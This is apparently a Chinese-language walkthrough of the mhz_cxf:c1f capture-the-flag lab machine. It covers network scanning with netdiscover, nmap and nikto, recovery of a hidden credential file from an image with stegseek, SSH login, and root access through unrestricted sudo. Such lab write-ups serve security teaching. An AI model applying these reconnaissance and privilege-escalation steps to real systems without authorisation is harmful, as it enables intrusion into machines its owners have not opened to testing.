作者: jason huawen


名称:mhz_cxf: c1f



 sudo netdiscover -i eth1 -r
Currently scanning:   |   Screen View: Unique Hosts                                                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                     08:00:27:64:18:1b      1      60  PCS Systemtechnik GmbH                                                                             08:00:27:02:7b:29      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.249


└─$ sudo nmap -sS -sV -sC -p- -oN nmap_full_scan
Starting Nmap 7.92 ( ) at 2023-04-07 02:18 EDT
Nmap scan report for localhost (
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
|   256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
|_  256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:02:7B:29 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds



─$ curl
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>

└─$ nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2023-04-07 02:19:53 (GMT-4)
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a40b796e2191, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /notes.txt: This might be interesting...
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-07 02:20:17 (GMT-4) (24 seconds)
+ 1 host(s) tested
└─$ curl 
1- i should finish my second lab 
2- i should delete the remb.txt file and remb2.txt

notes.txt提示可能有两个文件:remb.txt, remb2.txt

└─$ curl  
└─$ curl
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>


└─$ ssh [email protected]                             
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:Jxm0b2xUhxb2N50E9UVsgn5u7Pow8xX6o12kZDGlTlg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri Apr  7 06:33:12 UTC 2023

  System load:  0.0               Processes:             90
  Usage of /:   38.2% of 9.78GB   Users logged in:       0
  Memory usage: 16%               IP address for enp0s3:
  Swap usage:   0%

23 packages can be updated.
0 updates are security updates.

Last login: Fri Apr 24 18:18:07 2020 from
$ id
uid=1001(first_stage) gid=1001(first_stage) groups=1001(first_stage)
$ bash -i

first_stage@mhz_c1f:~$ cat user.txt 
HEEEEEY , you did it 
that's amazing , good job man

so just keep it up and get the root bcz i hate low privileges ;)


将mhz_ctf家目录的图片下载到Kali Linux本地进行分析,其中一个图片可以破解密码从而解密内容:

└─$ stegseek spi.jpeg            
StegSeek 0.6 -

[i] Found passphrase: ""
[i] Original filename: "remb2.txt".
[i] Extracting to "spi.jpeg.out".

└─$ cat spi.jpeg.out                          
ooh , i know should delete this , but i cant' remember it 
screw me 


first_stage@mhz_c1f:/home/mhz_c1f/Paintings$ su - mhz_c1f 
mhz_c1f@mhz_c1f:~$ id
uid=1000(mhz_c1f) gid=1000(mhz_c1f) groups=1000(mhz_c1f),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
mhz_c1f@mhz_c1f:~$ sudo -l
[sudo] password for mhz_c1f: 
Matching Defaults entries for mhz_c1f on mhz_c1f:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mhz_c1f may run the following commands on mhz_c1f:
    (ALL : ALL) ALL
mhz_c1f@mhz_c1f:~$ sudo /bin/bash
root@mhz_c1f:~# cd /root
root@mhz_c1f:/root# ls -alh
total 32K
drwx------  3 root root 4.0K Apr 24  2020 .
drwxr-xr-x 24 root root 4.0K Apr 13  2020 ..
-rw-------  1 root root   54 Apr 24  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  124 Apr 24  2020 .root.txt
drwx------  2 root root 4.0K Apr 13  2020 .ssh
-rw-------  1 root root  833 Apr 24  2020 .viminfo
root@mhz_c1f:/root# cat .root.txt

Well done sir , you have successfully got the root flag.
I hope you enjoyed in this mission.


至此得到了root shell以及root flag


  1. 在得到shell后提权时方向是对的,因为检查其他的提权漏洞都没有发现,可疑的就是mhz_ctf用户目录下的几个图片文件,但是在检查了2个图片后就中止,以为方向问题,其实答案就在第4个图片文件中,所以需要坚持的精神

热门相关:仙城纪   第一神算:纨绔大小姐   致灿烂的你   情生意动   薄先生,情不由己